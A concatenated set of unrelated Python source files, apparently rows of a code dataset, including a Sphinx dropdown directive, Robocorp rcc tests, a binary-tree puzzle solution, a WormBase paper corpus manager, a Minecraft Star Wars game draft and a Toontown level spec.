else:
classes[element + "_classes"] = value.split()
# add animation classes
if (
"animate" in self.options
and self.options["animate"] not in classes["container_classes"]
):
classes["container_classes"].append(self.options["animate"])
container = nodes.container(
"",
marker_color=self.options.get("marker-color", "currentColor"),
opened="open" in self.options,
type="dropdown",
has_title=len(self.arguments) > 0,
**classes
)
if self.arguments:
textnodes, messages = self.state.inline_text(self.arguments[0], self.lineno)
container += nodes.paragraph(self.arguments[0], "", *textnodes)
container += messages
self.state.nested_parse(self.content, self.content_offset, container)
self.add_name(container)
return [container]
CHEVRON = """\
<svg xmlns="http://www.w3.org/2000/svg" width="24" height="24"
viewBox="0 0 24 24" fill="none"
stroke="{color}" stroke-width="2"stroke-linecap="round" stroke-linejoin="round"
>
<polyline points="{points}"></polyline>
</svg>"""
ELLIPSIS = """\
<svg viewBox="0 0 36 24" width="36" height="16" xmlns="http://www.w3.org/2000/svg"
data-icon="ui-components:ellipses" class="ellipsis">
<g xmlns="http://www.w3.org/2000/svg" class="jp-icon3" fill="currentColor">
<circle cx="0" cy="12" r="6"></circle>
<circle cx="18" cy="12" r="6"></circle>
<circle cx="36" cy="12" r="6"></circle>
</g>
</svg>"""
class DropdownHtmlTransform(SphinxPostTransform):
default_priority = 200
builders = ("html", "dirhtml", "singlehtml", "readthedocs")
def run(self):
matcher = NodeMatcher(nodes.container, type="dropdown")
for node in self.document.traverse(matcher):
open_marker = nodes.container(
"",
nodes.raw(
"",
nodes.Text(
CHEVRON.format(
color=node["marker_color"], points="18 15 12 9 6 15"
)
),
format="html",
),
is_div=True,
classes=["summary-chevron-down"],
)
closed_marker = nodes.container(
"",
nodes.raw(
"",
nodes.Text(
CHEVRON.format(
color=node["marker_color"], points="6 9 12 15 18 9"
)
),
format="html",
),
is_div=True,
classes=["summary-chevron-up"],
)
newnode = dropdown_main(
opened=node["opened"],
classes=["sphinx-bs", "dropdown", "card"] + node["container_classes"],
)
if node["has_title"]:
title_children = node[0]
body_children = node[1:]
else:
title_children = [nodes.raw("...", nodes.Text(ELLIPSIS), format="html")]
body_children = node
newnode += dropdown_title(
"",
"",
*title_children,
closed_marker,
open_marker,
classes=["summary-title", "card-header"] + node["title_classes"]
)
body_node = nodes.container(
"",
*body_children,
is_div=True,
classes=["summary-content", "card-body"] + node["body_classes"]
)
for para in body_node.traverse(nodes.paragraph):
para["classes"] = ([] if "classes" in para else para["classes"]) + [
"card-text"
]
newnode += body_node
# newnode += open_marker
node.replace_self(newnode)
|
python
|
from robocorp_code.protocols import IRcc, IRccRobotMetadata
import py.path
def test_rcc_template_names(rcc: IRcc):
result = rcc.get_template_names()
assert result.success
assert result.result
assert "standard" in result.result
def test_rcc_cloud(rcc: IRcc, ci_credentials: str, tmpdir: py.path.local):
assert not rcc.credentials_valid()
result = rcc.add_credentials(ci_credentials)
assert result.success
assert rcc.credentials_valid()
result = rcc.cloud_list_workspaces()
assert result.success
workspaces = result.result
if not workspaces:
raise AssertionError("Expected to have CI Workspace available.")
workspaces = [ws for ws in workspaces if ws.workspace_name == "CI workspace"]
if not workspaces:
raise AssertionError("Expected to have CI Workspace available.")
ws = workspaces[0]
result = rcc.cloud_list_workspace_robots(ws.workspace_id)
assert result.success
lst = result.result
if lst is None:
raise AssertionError("Found no workspace")
acts = [act for act in lst if act.robot_name == "CI activity"]
if not acts:
result = rcc.cloud_create_robot(ws.workspace_id, "CI activity")
assert result.success
result = rcc.cloud_list_workspace_robots(ws.workspace_id)
assert result.success
lst = result.result
if lst is None:
raise AssertionError("Found no activity")
acts = [act for act in lst if act.robot_name == "CI activity"]
if not acts:
raise AssertionError(
"Expected to be able to create CI activity (or have it there already)."
)
act: IRccRobotMetadata = acts[0]
wsdir = str(tmpdir.join("ws"))
result = rcc.create_robot("standard", wsdir)
assert result.success
result = rcc.cloud_set_robot_contents(wsdir, ws.workspace_id, act.robot_id)
assert result.success
def test_rcc_run_with_conda_yaml(rcc: IRcc, rcc_conda_installed):
python_code = """
import sys
sys.stdout.write('It worked')
"""
conda_yaml_str_contents = """
channels:
- defaults
- conda-forge
dependencies:
- python=3.7.5
"""
result = rcc.run_python_code_robot_yaml(python_code, conda_yaml_str_contents)
assert result.success
assert result.result
# Note: even in silent mode we may have additional output!
assert "It worked" in result.result
def test_numbered_dir(tmpdir):
from robocorp_code.rcc import make_numbered_in_temp
from pathlib import Path
import time
registered = []
from functools import partial
def register(func, *args, **kwargs):
registered.append(partial(func, *args, **kwargs))
n = make_numbered_in_temp(
keep=2, lock_timeout=0.01, tmpdir=Path(tmpdir), register=register
)
# Sleep so that it'll be scheduled for removal at the next creation.
time.sleep(0.02)
assert n.name.endswith("-0")
assert n.is_dir()
n = make_numbered_in_temp(
keep=2, lock_timeout=0.01, tmpdir=Path(tmpdir), register=register
)
assert n.name.endswith("-1")
assert n.is_dir()
n = make_numbered_in_temp(
keep=2, lock_timeout=0.01, tmpdir=Path(tmpdir), register=register
)
assert n.name.endswith("-2")
assert n.is_dir()
# Removed dir 0.
assert len(list(n.parent.iterdir())) == 3
for r in registered:
r()
assert len(list(n.parent.iterdir())) == 2
|
python
|
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
lookup = {1:[TreeNode(0)]}
def allPossibleFBT(self, N):
if N%2 == 0:
return None
if N not in Solution.lookup:
ans = []
for x in range(1,N,2):
y = N - 1 -x
for left in self.allPossibleFBT(x):
for right in self.allPossibleFBT(y):
root = TreeNode(0)
root.left = left
root.right = right
ans.append(root)
Solution.lookup[N] = ans
return Solution.lookup[N]
|
python
|
import unittest
from preset import ActionTypes, Step, Preset
class TestStep(unittest.TestCase):
def test_01_constructor_and_properties(self):
temp_name = "name"
temp_value = "value"
temp_executable = lambda x: x
temp_action_type = ActionTypes.filter
temp_instance = Step(temp_name, temp_value, temp_executable, temp_action_type)
self.assertEqual(temp_name, temp_instance.name)
self.assertEqual(temp_value, temp_instance.value)
self.assertEqual(temp_executable, temp_instance.executable)
self.assertEqual(temp_action_type, temp_instance.action_type)
class TestPreset(unittest.TestCase):
def test_01_constructor_and_properties(self):
temp_names = ["name1", "name2", "name3"]
temp_values = ["value1", "value2", "value3"]
temp_executables = [lambda x: x, lambda y: y + 2, lambda z: z + 3]
temp_action_types = [ActionTypes.filter, ActionTypes.enhanceAction, ActionTypes.custom]
steps = [Step(temp_names[i], temp_values[i], temp_executables[i], temp_action_types[i]) for i in range(len(temp_names))]
instance_name = "foo"
instance_description = "description"
temp_instance = Preset(instance_name, instance_description, steps)
self.assertEqual(instance_name, temp_instance.name)
self.assertEqual(instance_description, temp_instance.description)
for i, step in enumerate(temp_instance.steps):
self.assertEqual(steps[i], step)
if __name__ == '__main__':
unittest.main()
|
python
|
import logging
import os
import pickle
from typing import Generator, List, Tuple, Dict
from gensim.models import Word2Vec
from gensim.test.utils import common_texts
from wbtools.db.dbmanager import WBDBManager
from wbtools.lib.nlp.common import PaperSections
from wbtools.lib.nlp.text_preprocessing import preprocess
from wbtools.lib.nlp.text_similarity import get_softcosine_index, get_similar_documents, SimilarityResult
from wbtools.literature.paper import WBPaper
logger = logging.getLogger(__name__)
class CorpusManager(object):
"""manage a list of WBPaper objects by populating their data from database or local directory"""
def __init__(self):
self.corpus = {}
def add_or_update_wb_paper(self, wb_paper: WBPaper):
"""add a paper
Args:
wb_paper(WBPaper): the paper to add to the corpus
"""
self.corpus[wb_paper.paper_id] = wb_paper
def remove_wb_paper(self, wb_paper: WBPaper):
"""remove a paper
Args:
wb_paper(WBPaper): the paper to remove from the corpus
"""
del self.corpus[wb_paper.paper_id]
def load_from_dir_with_txt_files(self, dir_path: str):
"""
load papers from a directory containing text files with file name in the following format:
<WBPaperID>_<Author><Year>_<additional_options>.txt
Only files with .txt extension are loaded. Paper ID is derived from the file name and additional options are
used to understand the type of file (e.g., main article, ocr scanned article, supplementary material etc.)
Args:
dir_path (str): path to the input directory containing text files
"""
paper = WBPaper()
for f in sorted(os.listdir(dir_path)):
if os.path.isfile(os.path.join(dir_path, f)) and f.endswith(".txt"):
if paper.paper_id and not paper.has_same_wbpaper_id_as_filename(f):
self.add_or_update_wb_paper(paper)
paper = WBPaper()
paper.add_file(dir_path=dir_path, filename=f, remote_file=False, pdf=False)
def load_from_wb_database(self, db_name: str, db_user: str, db_password: str, db_host: str,
ssh_host: str = 'tazendra.caltech.edu', ssh_user: str = None, ssh_passwd: str = None,
paper_ids: list = None,
from_date: str = None, load_pdf_files: bool = True, load_bib_info: bool = True,
load_curation_info: bool = True, load_afp_info: bool = False, max_num_papers: int = None,
exclude_ids: List[str] = None, must_be_autclass_flagged: bool = False,
exclude_temp_pdf: bool = False, exclude_pap_types: List[str] = None,
pap_types: List[str] = None,
exclude_afp_processed: bool = False, exclude_afp_not_curatable: bool = False,
exclude_no_main_text: bool = False, exclude_no_author_email: bool = False) -> None:
"""load papers from WormBase database
Args:
db_name (str): database name
db_user (str): database user
db_password (str): database password
db_host (str): database host
ssh_host (str): host where to fetch the files via ssh
ssh_user (str): ssh user to fetch pdf files
ssh_passwd (str): ssh password to fetch pdf files
paper_ids (list): optional list of paper ids to be fetched
from_date (str): load papers added or modified from the specified date (only if paper_ids is not provided)
load_pdf_files (bool): load pdf files using ssh credentials
load_bib_info (bool): load bibliographic info of the papers
load_curation_info (bool): load curation info of the papers
load_afp_info (bool): load author first pass info of the papers
max_num_papers (int): limit number of papers to be loaded
exclude_ids (List[str]): list of paper ids to exclude
must_be_autclass_flagged (bool): whether to exclude papers that have not been flagged by WB classifiers
exclude_temp_pdf (bool): whether to exclude papers with temp pdfs only
exclude_pap_types (List[str]): list of pap_types (string value, not numeric) to exclude
pap_types (List(str]): list of paper types to load
exclude_afp_processed (bool): whether to exclude
exclude_afp_not_curatable (bool): whether to exclude papers that are not relevant for AFP curation
exclude_no_main_text (bool): whether to exclude papers without a fulltext that can be converted to txt
exclude_no_author_email (bool): whether to exclude papers without any contact email in WB
"""
main_db_manager = WBDBManager(db_name, db_user, db_password, db_host)
with main_db_manager:
if not paper_ids:
paper_ids = main_db_manager.generic.get_all_paper_ids(added_or_modified_after=from_date,
exclude_ids=exclude_ids)
if pap_types:
ids_to_include = set(main_db_manager.generic.get_paper_ids_with_pap_types(pap_types))
paper_ids = [paper_id for paper_id in paper_ids if paper_id in ids_to_include]
if exclude_pap_types:
ids_to_exclude = set(main_db_manager.generic.get_paper_ids_with_pap_types(exclude_pap_types))
paper_ids = [paper_id for paper_id in paper_ids if paper_id not in ids_to_exclude]
if load_afp_info or exclude_afp_processed:
afp_no_submission_ids = main_db_manager.afp.get_paper_ids_afp_no_submission()
afp_full_submission_ids = main_db_manager.afp.get_paper_ids_afp_full_submission()
afp_partial_submission_ids = main_db_manager.afp.get_paper_ids_afp_partial_submission()
else:
afp_no_submission_ids = []
afp_full_submission_ids = []
afp_partial_submission_ids = []
afp_processed_ids = set(afp_no_submission_ids) | set(afp_partial_submission_ids) | set(afp_full_submission_ids)
afp_curatable = set(main_db_manager.afp.get_afp_curatable_paper_ids() if exclude_afp_not_curatable else [])
blacklisted_email_addresses = main_db_manager.generic.get_blacklisted_email_addresses() if \
exclude_no_author_email else []
for paper_id in paper_ids:
paper = WBPaper(paper_id=paper_id, ssh_host=ssh_host, ssh_user=ssh_user,
ssh_passwd=ssh_passwd, db_manager=main_db_manager.paper)
if exclude_afp_processed and paper_id in afp_processed_ids:
logger.info("Skipping paper already processed by AFP")
continue
if exclude_afp_not_curatable and paper_id not in afp_curatable:
logger.info("Skipping paper not AFP curatable")
continue
if load_pdf_files:
logger.info("Loading text from PDF files for paper")
paper.load_text_from_pdf_files_in_db()
if exclude_temp_pdf and paper.is_temp():
logger.info("Skipping proof paper")
continue
if exclude_no_main_text and not paper.has_main_text():
logger.info("Skipping paper without main text")
continue
# functions with db access
with paper.db_manager:
if load_curation_info:
logger.info("Loading curation info for paper")
paper.load_curation_info_from_db()
if must_be_autclass_flagged and not paper.aut_class_values:
logger.info("Skipping paper without automated classification")
continue
if load_bib_info:
logger.info("Loading bib info for paper")
paper.load_bib_info_from_db()
if exclude_no_author_email and not paper.get_authors_with_email_address_in_wb(
blacklisted_email_addresses=blacklisted_email_addresses):
logger.info("Skipping paper without any email address in text with records in WB")
continue
if load_afp_info:
logger.info("Loading AFP info for paper")
paper.load_afp_info_from_db(paper_ids_no_submission=afp_no_submission_ids,
paper_ids_full_submission=afp_full_submission_ids,
paper_ids_partial_submission=afp_partial_submission_ids)
self.add_or_update_wb_paper(paper)
logger.info("Paper " + paper_id + " added to corpus. Corpus size: " + str(self.size()))
if max_num_papers and self.size() >= max_num_papers:
break
def size(self) -> int:
"""number of papers in the corpus manager
Returns:
int: the number of papers
"""
return len(self.corpus)
def get_flat_corpus_list_and_idx_paperid_map(self, split_sentences: bool = False,
remove_sections: List[PaperSections] = None,
must_be_present: List[PaperSections] = None,
lowercase: bool = False, tokenize: bool = False,
remove_stopwords: bool = False,
remove_alpha: bool = False) -> Tuple[List[str], Dict[int, str]]:
"""get a flat list of text documents from the papers in the corpus and a map to link the index in the resulting
list and the id of the related paper
Args:
split_sentences (bool): split sentences into separate documents
remove_sections (List[PaperSections]): list of sections to remove
must_be_present (List[PaperSections]): list of sections that must be present
lowercase (bool): transform text to lowercase
tokenize (bool): tokenize text into words
remove_stopwords (bool): remove common stopwords from text
remove_alpha (bool): remove special characters and punctuation from text
Returns:
Tuple[List[str], Dict[int, str]]: the flat list and the related index to paper id map
"""
flat_list_with_ids = [(doc, paper.paper_id) for paper in self.corpus.values() for doc in paper.get_text_docs(
include_supplemental=True, remove_sections=remove_sections, must_be_present=must_be_present,
split_sentences=split_sentences, lowercase=lowercase, tokenize=tokenize, remove_stopwords=remove_stopwords,
remove_alpha=remove_alpha)]
return [d[0] for d in flat_list_with_ids], {idx: d[1] for idx, d in enumerate(flat_list_with_ids)}
def get_paper(self, paper_id) -> WBPaper:
"""get a paper from the corpus by paper id
Args:
paper_id (str): paper id to retrieve
Returns:
WBPaper: the paper
"""
return self.corpus[paper_id]
def get_all_papers(self) -> Generator[WBPaper, None, None]:
"""get all the papers in the corpus
Returns:
Generator[WBPaper, None, None]: a generator to the papers in the corpus
"""
for paper in self.corpus.values():
yield paper
def save(self, file_path: str) -> None:
"""save corpus to file
Args:
file_path (str): path to file to save
"""
with open(file_path, 'wb') as out_file:
pickle.dump(self, out_file)
def load(self, file_path: str) -> None:
"""load corpus from previously saved file
Args:
file_path (str): path to file to load
"""
with open(file_path, 'rb') as in_file:
tmp_self = pickle.load(in_file)
self.__dict__ = tmp_self.__dict__
def query_papers_by_doc_similarity(self, query_docs: List[str], sentence_search: bool = False,
remove_sections: List[PaperSections] = None,
must_be_present: List[PaperSections] = None, path_to_model: str = None,
average_match: bool = True, num_best: int = 10) -> List[SimilarityResult]:
"""query papers in the corpus by similarity with the provided query documents, which can be fulltext documents
or sentences
Args:
query_docs (List[str]): list of query documents
sentence_search (bool): perform sentence level similarity search
remove_sections (List[PaperSections]): sections to be ignored from corpus papers
must_be_present (List[PaperSections]): sections that must be present in corpus papers before removing
sections
path_to_model (str): path to word2vec model
average_match (bool): merge query documents and calculate average similarity to them
num_best (int): limit to the first n results by similarity score
Returns:
List[SimilarityResult]: list of papers most similar to the provided query documents
"""
model = Word2Vec(common_texts, min_count=1) if not path_to_model else None
corpus_list_token, idx_paperid_map = self.get_flat_corpus_list_and_idx_paperid_map(
split_sentences=sentence_search, remove_sections=remove_sections, must_be_present=must_be_present,
lowercase=True, tokenize=True, remove_stopwords=True, remove_alpha=True)
corpus_list_token_orig, _ = self.get_flat_corpus_list_and_idx_paperid_map(
split_sentences=sentence_search, remove_sections=remove_sections, must_be_present=must_be_present,
lowercase=False, tokenize=False, remove_stopwords=False, remove_alpha=False)
docsim_index, dictionary = get_softcosine_index(model=model, model_path=path_to_model,
corpus_list_token=corpus_list_token, num_best=num_best)
query_docs_preprocessed = [preprocess(doc=sentence, lower=True, tokenize=True, remove_stopwords=True,
remove_alpha=True) for sentence in query_docs]
sims = get_similar_documents(docsim_index, dictionary, query_docs_preprocessed, idx_paperid_map,
average_match=average_match)
results = [SimilarityResult(score=sim.score, paper_id=sim.paper_id, match_idx=sim.match_idx,
query_idx=sim.query_idx, match="\"" + corpus_list_token_orig[sim.match_idx] + "\"",
query="\"" + (" ".join(query_docs) if average_match else query_docs[sim.query_idx]
) + "\"") for sim in sims]
return results[0:num_best] if len(results) > num_best else results
|
python
|
# game.py (c) 2017 D.J.Whale 22/01/2017
# Star-Wars 'Use the Force, Luke' game
# Using many moving parts provided by Martin O'Hanlon
#----- CONFIGURATION ----------------------------------------------------------
DEATHSTAR_CENTRE_POS = (100,100,10)
TARGET_POS = (100,100,10)
IN_RANGE = ((100,100,10), (100,100,10))
XWING_START_POS = (46,10,-61)
PLAY_TIME_SECS = 5 #(2*60)
NUMBER_OF_TRIES = 3
FRAMES_PER_SEC = 10
#TODO: Mart's code animates the trench separately from deathstar
#so do we need to switch over to that animation at the right position?
#also is there a visual clue to where the trench is, in the deathstar model?
#TODO: xwing can turn or shift
#might make it turn if you tilt it left or right a long way
#in which case we need l,L and r,R for two ranges of left and right tilt
#----- LOAD ALL THE DEPENDENT PARTS -------------------------------------------
import sys
if sys.version_info[0] != 2:
print("Please run this game with Python version 2")
sys.exit()
import time
import controller # auto-connects to the controller
import starwars # auto-connects to Minecraft
#----- GAME STATE -------------------------------------------------------------
deathstar = None
xwing = None
missile = None
xwing_crashed = False
missile_missed = False
missile_hit = False
game_stop_time = 0
#----- BUILD THE GAME WORLD ---------------------------------------------------
def clear_space():
print("will clear_space")
#TODO:
def build_deathstar():
print("will build_deathstar")
#TODO: build at DEATHSTAR_CENTRE_POS
def create_xwing():
global xwing
if xwing is not None:
# kill off old x-wing
xwing.clear()
xwing = None
xwing = starwars.MCObject(starwars.XWING_BLOCKS, XWING_START_POS)
xwing.draw()
def setup_game():
clear_space()
build_deathstar()
create_xwing()
clear_flags()
def wait_for_start():
print("will wait_for_start")
raw_input("press RETURN to start")
#TODO: wait for A button press on micro:bit
#loop, read from micro:bit, until see 'A'
#----- GAME ACTIONS -----------------------------------------------------------
def fly_xwing():
buttons = controller.get_command_flags()
if buttons is not None:
up = 'U' in buttons
down = 'D' in buttons
left = 'L' in buttons
right = 'R' in buttons
fire = 'A' in buttons
eject = 'B' in buttons
# change xwing position based on u/d/l/r
if left:
xwing.rotate_by(yaw=-10)
print("left")
if right:
xwing.rotate_by(yaw=+10)
print("right")
if up:
xwing.move_by(y=+1)
print("up")
if down:
xwing.move_by(y=-1)
print("down")
if fire: print("boom!!")
if eject: print("yeehar!!")
# always move xwing forward by one block
xwing.fly()
# if xwing crashes into any block
# set_xwing_crashed()
#if fire: start_missile()
#if eject: ejector_seat()
def start_missile():
print("will start_missile")
#TODO:
# create missile object in front of xwing
# note we need to know what direction the xwing is flying in
# we also need to know a range of positions to succeed from
def move_missile():
print("will move_missile")
#TODO:
# if missile now out of range:
# set_missile_missed()
# elif missile not yet hit target:
# move missile forward by 1
# else must have hit
# set_missile_hit()
def ejector_seat():
print("will ejector_seat")
animate_eject()
animate_xwing_crashed()
set_xwing_crashed()
#------ GAME CONDITIONS -------------------------------------------------------
#
# Set various game conditions in the game state.
# The main loop will detect and action these appropriately.
# This prevents passing lots of variables around,
# but contains the global variables a bit more into a controlled space (here)
def clear_flags():
global xwing_crashed, missile_missed, missile_hit
xwing_crashed = False
missile_missed = False
missile_hit = False
def set_xwing_crashed():
global xwing_crashed
xwing_crashed = True
def set_missile_missed():
global missile_missed
missile_missed = True
def set_missile_hit():
global missile_hit
missile_hit = True
#----- ANIMATIONS -------------------------------------------------------------
def animate_missile_missed():
print("will animate_missile_missed")
#TODO:
def animate_missile_hit():
print("will animate_missile_hit")
#TODO:
def animate_eject():
print("will animate_eject")
#TODO:
def animate_xwing_crashed():
print("will xwing_crashed")
#TODO:
def animate_blow_up_deathstar():
print("will blow_up_deathstar")
#TODO:
# auto pilot the ship to a safe location
# animate the deathstar blowing up
# return when deathstar gone
#----- SPLASH SCREENS ---------------------------------------------------------
def splash_screen():
print("will splash_screen")
#TODO:
def game_over_failed():
print("will game_over_failed")
#TODO:
def game_over_succeeded():
print("will game_over_succeeded")
#TODO:
#----- GAME LOOP --------------------------------------------------------------
def start_game():
global game_stop_time
print("will start_game")
#TODO: move player to position on start (hides splash screen)
game_stop_time = time.time() + PLAY_TIME_SECS
def run_out_of_time():
return time.time() >= game_stop_time
def play_game():
missiles_left = NUMBER_OF_TRIES
while not run_out_of_time() and not xwing_crashed and not missile_hit and missiles_left > 0:
time.sleep(1/float(FRAMES_PER_SEC))
fly_xwing()
if missile is not None:
move_missile()
if missile_missed:
animate_missile_missed()
missiles_left -= 1
elif missile_hit:
animate_missile_hit()
animate_blow_up_deathstar()
return missile_hit
def whereami():
import starwars.mcpi.minecraft as minecraft
mc = minecraft.Minecraft.create()
x,y,z = mc.player.getTilePos()
print(x,y,z)
#----- MAIN PROGRAM -----------------------------------------------------------
#if __name__ == "__main__":
# while True:
# setup_game()
# splash_screen()
# wait_for_start()
# start_game()
#
# success = play_game()
#
# if success:
# game_over_succeeded()
# else:
# game_over_failed()
#whereami()
create_xwing()
while True:
print("fly")
fly_xwing()
time.sleep(0.1)
# END
|
python
|
from toontown.coghq.SpecImports import *
GlobalEntities = {1000: {'type': 'levelMgr', 'name': 'LevelMgr', 'comment': '',
'parentEntId': 0,
'cogLevel': 0,
'farPlaneDistance': 1500,
'modelFilename': 'phase_11/models/lawbotHQ/LB_Zone7a',
'wantDoors': 1},
1001: {'type': 'editMgr', 'name': 'EditMgr',
'parentEntId': 0,
'insertEntity': None,
'removeEntity': None,
'requestNewEntity': None,
'requestSave': None},
0: {'type': 'zone', 'name': 'UberZone',
'comment': '',
'parentEntId': 0,
'scale': 1,
'description': '',
'visibility': []},
10013: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 10000,
'pos': Point3(57.0219, 5.15024, 0),
'hpr': Vec3(270, 0, 0),
'scale': Vec3(0.660517, 0.660517, 0.660517),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_C.bam'},
10015: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 10000,
'pos': Point3(-25.74, 58.3575, 9.73551),
'hpr': Vec3(95.4403, 0, 0),
'scale': Vec3(1.5379, 1.5379, 1.5379),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
10016: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 10000,
'pos': Point3(33.3395, -18.3643, 0),
'hpr': Vec3(180, 0, 0),
'scale': Vec3(0.66, 0.66, 0.66),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_D1.bam'},
10017: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 10018,
'pos': Point3(0, 0, 0),
'hpr': Point3(169.7, 0, 0),
'scale': Vec3(0.90247, 0.90247, 0.90247),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_D4.bam'},
10020: {'type': 'model', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 10018,
'pos': Point3(-12.0714, 0, 0),
'hpr': Vec3(288.435, 0, 0),
'scale': Vec3(0.90247, 0.90247, 0.90247),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_D4.bam'},
10022: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 10021,
'pos': Point3(-5.97179, -60.3134, 0),
'hpr': Vec3(180, 0, 0),
'scale': Vec3(0.869391, 0.869391, 0.869391),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_10/models/cashbotHQ/pipes_C.bam'},
100015: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-1.31696, 0, 0.1),
'hpr': Vec3(0, 0, 0),
'scale': Point3(1.6, 1, 1),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100016: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-12.7478, -11.9991, 0.05),
'hpr': Vec3(180.47, 0, 0),
'scale': Point3(1, 1, 1),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_couchA'},
100017: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-17.0503, 0, 0.1),
'hpr': Vec3(0, 0, 0),
'scale': Point3(1, 1, 1),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100019: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(0.897832, -12.2053, 0.05),
'hpr': Vec3(180.47, 0, 0),
'scale': Point3(1, 1, 1),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_couchA'},
100020: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(6.3491, -6.57612, 0.05),
'hpr': Vec3(90, 0, 0),
'scale': Point3(1, 1, 0.5),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/PartitionA'},
100021: {'type': 'model', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-20.9336, -5.07158, 0.05),
'hpr': Vec3(90, 0, 0),
'scale': Vec3(1.00449, 1.00449, 1.00449),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_paper_twist_stacks'},
100022: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100018,
'pos': Point3(4.96172, -5.07158, 0.05),
'hpr': Vec3(272.49, 0, 0),
'scale': Vec3(1.00449, 1.00449, 1.00449),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_paper_twist_stacks'},
100023: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-20.5363, -8.42755, 0.05),
'hpr': Vec3(90, 0, 0),
'scale': Vec3(1.00449, 1.00449, 1.00449),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_chairA'},
100024: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100018,
'pos': Point3(-4.9392, -12.3495, 0.05),
'hpr': Vec3(180.47, 0, 0),
'scale': Vec3(3.79099, 3.79099, 3.79099),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_torch_lampA'},
100026: {'type': 'model', 'name': '<unnamed>',
'comment': '',
'parentEntId': 100025,
'pos': Point3(16.7866, 12.9562, 0.1),
'hpr': Vec3(185.194, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100027: {'type': 'model', 'name': 'copy of <unnamed>',
'comment': '',
'parentEntId': 100025,
'pos': Point3(-21.2469, 12.8535, 0.0929851),
'hpr': Vec3(187.125, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100028: {'type': 'model', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(5.20127, 12.8535, 0.0929851),
'hpr': Vec3(180, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100029: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(-8.51009, 13.1118, 0.0929851),
'hpr': Vec3(180, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100030: {'type': 'model', 'name': 'copy of <unnamed> (2)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(-15.7803, 1.79844, 0.0929851),
'hpr': Vec3(188.13, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
'modelPath': 'phase_11/models/lawbotHQ/LB_bookshelfA'},
100031: {'type': 'model', 'name': 'copy of <unnamed> (3)',
'comment': '',
'parentEntId': 100025,
'pos': Point3(14.449, 2.90238, 0.0929851),
'hpr': Vec3(184.764, 0, 0),
'scale': Vec3(1.2, 1.2, 1.2),
'collisionsOnly': 0,
'flattenType': 'light',
'loadType': 'loadModelCopy',
